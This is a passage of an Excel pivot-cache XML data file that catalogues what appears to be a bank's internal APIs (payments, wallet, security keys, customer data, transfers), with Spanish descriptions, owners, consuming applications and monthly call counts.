    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-26T20:39:37"/>
    <s v="Tec - Payments"/>
    <n v="124"/>
    <s v="Tec - Payments - Bancolombia Button Management"/>
    <n v="102"/>
    <s v="tec-payments-bancolombia-button-management"/>
    <s v="El api Tec - Payments - Bancolombia Button Management permite realizar diferentes operaciones relacionadas con el boton Bancolombia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="Ecosistema De Pagos_AW1314001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001"/>
    <n v="122"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-07-28T18:17:28"/>
    <s v="Tec - Payments"/>
    <n v="124"/>
    <s v="Tec - Payments - QR Management"/>
    <n v="112"/>
    <s v="tec-payments-qr-management"/>
    <s v="El api Tec - Payments - QR Management permite generar un QR que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P), dando la opción de generar una notificación adicional al momento del pago (diferente a las notificaciones por defecto de Aletas y Notificaciones). Adicionalmente permite solicita el enví­o fí­sico de un QR (en hablador), consultar la información de los QR generados por un comercio y la información de un QR en especí­fico."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Ecosistema De Pagos_AW1314001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001"/>
    <n v="17"/>
    <n v="4"/>
    <n v="1788"/>
    <n v="2602"/>
    <n v="102"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-15T20:23:15"/>
    <s v="Tec - Payments"/>
    <n v="124"/>
    <s v="Tec - Payments - Transaction Logs Management"/>
    <n v="104"/>
    <s v="tec-payments-bancolombia-logs-management"/>
    <s v="El api Tec - Payments - Transaction Logs Management permite grabar y consultar la información relacionada con las transacciones realizadas por los clientes en los diferentes servicios de aceptación de medios de pago."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Ecosistema De Pagos_AW1314001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001"/>
    <n v="405117"/>
    <n v="326149"/>
    <n v="2243305"/>
    <n v="3636291"/>
    <n v="4072765"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-26T03:16:29"/>
    <s v="Tec-Security"/>
    <n v="206"/>
    <s v="Tec - Security - Encrypted key"/>
    <n v="110"/>
    <s v="tec-security-encrypted-key"/>
    <s v="Esta API permite entregar a un consumidor la llave o el módulos para posteriormente con este dato realizar el cifrado del pin del cliente"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ TMP AW0360004_CONSTRUCTOR_SVE _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ PortalLibranzas_AW0360007 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ AppInversiones_AW1185001"/>
    <n v="4088"/>
    <n v="2553"/>
    <n v="10750"/>
    <n v="5247"/>
    <n v="4679"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-26T03:16:29"/>
    <s v="Tec-Security"/>
    <n v="173"/>
    <s v="Tec - Security - Encrypted key"/>
    <n v="110"/>
    <s v="tec-security-encrypted-key"/>
    <s v="Esta API permite entregar a un consumidor la llave o el módulos para posteriormente con este dato realizar el cifrado del pin del cliente"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <m/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ SUID_AW1310 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ NEQUIMAPAS_AW1011 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="4088"/>
    <n v="2553"/>
    <n v="10750"/>
    <n v="5247"/>
    <n v="4679"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-07-07T03:47:02"/>
    <s v="Tec - Support"/>
    <n v="102"/>
    <s v="Tec - Token DID - Consult and Send"/>
    <n v="102"/>
    <s v="tec-token-did-consult-send"/>
    <s v="Esta API permite realizar la consulta del tipo de enrolamiento en clave dinamica, y al mismo tiempo la generación y el envio del token ODA, dependiendo de la configuración del usuario."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <m/>
    <s v="Magda Catalina Trejos"/>
    <s v="GestionAutenticacionFuerte/V1.0"/>
    <s v="AutenticacionFuertes"/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="208181"/>
    <n v="143732"/>
    <n v="942430"/>
    <n v="1754325"/>
    <n v="1853012"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-11-20T18:05:31"/>
    <s v="Tec-Payments ACH Fulfillment"/>
    <n v="102"/>
    <s v="Tec - Transfer - Management"/>
    <n v="102"/>
    <s v="tec-transfer-management"/>
    <s v="El API permite realizar las siguientes operaciones de (Envió, recibo y solicitud dinero) de forma inmediata para realizar transferencias en lí­nea a cuentas Bancolombia y otros bancos"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="CapaGestionCanal_NU0014001"/>
    <n v="68114"/>
    <n v="53184"/>
    <n v="360742"/>
    <n v="579398"/>
    <n v="725758"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-26T17:45:02"/>
    <s v="Tec-Wallet"/>
    <n v="112"/>
    <s v="Tec - Wallet - Transactional - Log"/>
    <n v="102"/>
    <s v="tec-wallet-transactional-log"/>
    <s v="Con esta API se permitirá consultar la información de las novedades aplicadas de los clientes registrados en la Nueva Billetera.   Estas novedades incluyen:   - Registro del cliente en la billetera - Tarjetas del cliente en la billetera  - Tarjetas activas del cliente en la billetera - Tarjetas visibles del cliente en la billetera  - Tarjetas ocultas del cliente en la billetera - Tarjeta seleccionada como favorita por el cliente en la billetera (para pagos con NFC)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="1"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-11-10T14:42:32"/>
    <s v="Tec - Wallet Channel Customers"/>
    <n v="122"/>
    <s v="Tec - Wallet Channel Customers - Customer Cards"/>
    <n v="102"/>
    <s v="tec-wallet-channel-customers-customer-cards"/>
    <s v="Con esta API se permitirá consultar la información de registro de un cliente en la Nueva Billetera."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="116"/>
    <n v="128"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-05-26T14:29:33"/>
    <s v="Tec - Wallet Channel Customers"/>
    <n v="122"/>
    <s v="Tec - Wallet Channel Customers - Customer Enrollment"/>
    <n v="101"/>
    <s v="tec-wallet-channel-customers-customer-enrollment"/>
    <s v="Con esta API se permitirá consultar la información de las tarjetas de los clientes registradas en la Nueva Billetera. La búsqueda se puede realizar por los datos de identificación del cliente, el identificador de la billetera (wallet ID), o el identificador de la tarjeta en la billetera (card ID). "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="14"/>
    <n v="10"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-05-26T14:29:33"/>
    <s v="Tec - Wallet Channel Customers"/>
    <n v="122"/>
    <s v="Tec - Wallet Channel Customers  Customer Enrollment History"/>
    <n v="101"/>
    <s v="tec-wallet-channel-customers-customer-enrollment-history"/>
    <s v="Con esta API se permitirá consultar la información histórica de registro de los clientes en la nueva billetera. Tiene la opción de consultar la información histórica de un cliente (Todas las billeteras que ha tenido), o la consulta de todos los clientes registrados en el canal."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="112"/>
    <n v="128"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-11-10T14:42:32"/>
    <s v="Tec - Wallet Channel Customers"/>
    <n v="122"/>
    <s v="Tec - Wallet Customers - Customer Purchases"/>
    <n v="103"/>
    <s v="tec-wallet-customers-customer-purchases"/>
    <s v="Esta API permite consultar las compras realizadas por los clientes a través de la Nueva Billetera con las tecnologí­as habilitadas para pagos. â€¢_x0009_QR â€¢_x0009_NFC (Sólo se habilitará cuando se puedan realizar pagos con NFC)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="49"/>
    <n v="39"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-05-26T14:29:33"/>
    <s v="Tec - Wallet Channel Customers"/>
    <n v="122"/>
    <s v="Tec - Wallet Customers - Wallet Customers Management"/>
    <n v="100"/>
    <s v="tec-wallet-customers-wallet-customers-management"/>
    <s v="Esta API permite exponer las diferentes capacidades para gestionar los clientes en la billetera móvil. Inicialmente, la API tendrá las siguientes capacidades: â€¢_x0009_Bloquear o desbloquear por seguridad una billetera de un cliente â€¢_x0009_Cancelar definitivamente la billetera si el cliente así­ lo solicita o cuando el área de seguridad detecte una vulnerabilidad (fraude confirmado o movimientos inusuales)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-28T14:41:21"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Branch Commercial Team"/>
    <n v="102"/>
    <s v="tec-branch-commercial-team"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información de los códigos CIF y CRM del equipo comercial de una sucursal, es decir: su gerente, los asesores o vendedores y la identificación o código de la sucursal."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaDatosComercialesSucursal/V1.0"/>
    <s v="SAP CRM_AW0682001"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-19T14:12:15"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities - SME Generals Inquiry"/>
    <n v="101"/>
    <s v="tec-business-opportunities-generals-inquiry"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información general de las oportunidades comerciales del segmento personas y Pyme a la carta, que resultan de los modelos analí­ticos del banco y que se entregan a la LZ."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-11-04T08:57:04"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities - SME Management"/>
    <n v="102"/>
    <s v="tec_business_opportunities_SME_management"/>
    <s v="La API tiene la gestion de las oportunidades comerciales pyme."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-28T14:41:21"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities - SME PreApproved Inquiry"/>
    <n v="101"/>
    <s v="tec-business-opportunities-sme-preapproved-inquiry"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información general de las oportunidades comerciales de pre- aprobados de los clientes del segmento pyme, para pymes con estados financieros y preaprobados para pymes sin estados financieros, la api proporciona un método para cada grupo."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-22T16:48:13"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities MasterData"/>
    <n v="101"/>
    <s v="tec-business-opportunities-masterdata"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la informacion general de los catalogos."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <n v="5271"/>
    <n v="7652"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-19T14:12:15"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities Persons - Generals"/>
    <n v="101"/>
    <s v="tec-business-opportunities-persons-generals"/>
    <s v="La API permite consultar las oportunidades comerciales del segmento personas, de un cliente en particular."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-11-04T08:57:04"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities Persons - Management"/>
    <n v="102"/>
    <s v="tec_business_opportunities_persons_management"/>
    <s v="La API tiene la gestion de las oportunidades comerciales personas."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-19T14:12:15"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities Persons-Preapproved"/>
    <n v="101"/>
    <s v="tec-business-opportunities-persons-preapproved"/>
    <s v="La API permite consultar los pre-aprobados del segmento personas, de un cliente en particular."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-03-17T09:52:32"/>
    <s v="Tec-Channels"/>
    <n v="101"/>
    <s v="Tec-Channel - Service Points"/>
    <n v="101"/>
    <s v="service-points"/>
    <s v="El API de puntos de servicios permite realizar la consulta de los siguientes puntos de servicios del banco: Sucursales, Cajeros, corresponsales Bancarios. Esta consulta se realiza de acuerdo a la posición geográfica (Latitud y longitud)."/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Servicios Switch y Telefonica"/>
    <s v="Distribución Fisica"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ NEQUIMAPAS_AW1011"/>
    <n v="182495"/>
    <n v="125921"/>
    <n v="730283"/>
    <n v="1167112"/>
    <n v="1166640"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-09-21T14:03:38"/>
    <s v="Tec-Channels"/>
    <n v="200"/>
    <s v="Tec-Channel - Service Points"/>
    <n v="200"/>
    <s v="service-points"/>
    <s v="El API de puntos de servicios permite realizar la consulta de los siguientes puntos de servicios del banco: Sucursales, Cajeros, corresponsales Bancarios. Esta consulta se realiza de acuerdo a la posición geográfica (Latitud y longitud)."/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Servicios Switch y Telefonica"/>
    <s v="Distribución Fisica"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="GeorreferenciacionAPI"/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ JornadaPagos_AW1316001"/>
    <n v="2672"/>
    <n v="3942"/>
    <n v="11224"/>
    <n v="23126"/>
    <n v="16913"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-11-24T16:10:50"/>
    <s v="Tec-Commerce Portal"/>
    <n v="160"/>
    <s v="Tec-Commerce portal - Transaction Log"/>
    <n v="140"/>
    <s v="tec-commerce-portal-transaction-log"/>
    <s v="Esta API permitirá exponer las diferentes consultas que desde el canal portal comercio se requieren para la administración del canal desde el Modulo Administrativo u otros canales o consumidores que requieran acceder a la información del canal y a sus diferentes funcionalidades."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Portal Comercio"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo Administrativo Canales Digitales_AW1204 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="1635"/>
    <n v="2540"/>
    <n v="1541"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-13T01:27:18"/>
    <s v="Tec - Customer"/>
    <n v="121"/>
    <s v="Tec-Customer - Amount Limit Management"/>
    <n v="101"/>
    <s v="tec-customer-amount-limit-management"/>
    <s v="Esta API permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes según sea el caso. Para esto, el servicio permitirá consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta qué momento puede debitarse de sus cuentas."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionDeTopesMontosClientes/V1.0"/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ APM_NU0032001 _x000d__x000a_ LifeCoach_AW1240001 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ TabotWhatsapp_AW1165 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ NEQUIMDM_AW1011 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="17915"/>
    <n v="13548"/>
    <n v="106570"/>
    <n v="158841"/>
    <n v="180854"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-10-29T11:59:52"/>
    <s v="Tec - Customer"/>
    <n v="121"/>
    <s v="Tec-Customer - Basic Information"/>
    <n v="101"/>
    <s v="tec-customer-basic-information"/>
    <s v="La Api Tec-Customer - Basic Information permite la consulta de información Basica de un cliente sea persona natural o jurí­dica."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="RecuperarDatosCliente/V4.0"/>
    <s v="MDM"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ APM_NU0032001 _x000d__x000a_ LifeCoach_AW1240001 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ TabotWhatsapp_AW1165 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ NEQUIMDM_AW1011 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003"/>
    <m/>
    <m/>
    <n v="1749"/>
    <n v="2539"/>
    <n v="1545"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-14T15:57:28"/>
    <s v="Customer Sufi"/>
    <n v="100"/>
    <s v="Tec-Customer Data Sufi - Management"/>
    <n v="100"/>
    <s v="tec-customer-data-sufi-Management"/>
    <s v="API para la gestión de obligaciones Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-14T15:57:28"/>
    <s v="Customer Sufi"/>
    <n v="100"/>
    <s v="Tec-Customer Data Sufi - Retrieve"/>
    <n v="100"/>
    <s v="tec-customer-data-sufi-retrieve"/>
    <s v="API para consulta de datos generales Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-10-21T19:49:43"/>
    <s v="Products"/>
    <n v="110"/>
    <s v="Tec-Customer Products Natural Person"/>
    <n v="110"/>
    <s v="tec-customer-products-natural-person"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información de los productos que posee un cliente en el banco."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaProductosClientePersonas/V1.0"/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="194"/>
    <n v="62"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-18T09:18:16"/>
    <s v="Tec-Accounts"/>
    <n v="110"/>
    <s v="Tec-Deposit-Accounts"/>
    <n v="100"/>
    <s v="tec-deposit-accounts"/>
    <s v="Services that allows get information about deposit accounts"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <s v="ConsultaExtendidaDeSaldos/V1.0_x000a_ConsultaMovimientoDepositos/V1.0_x000a_ConsultaSaldosCuentasDepositos/V3.0"/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ NEQUICUEDEP_AW1011 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ PORTALCOBRANZA_AW1294001"/>
    <n v="141850"/>
    <n v="104322"/>
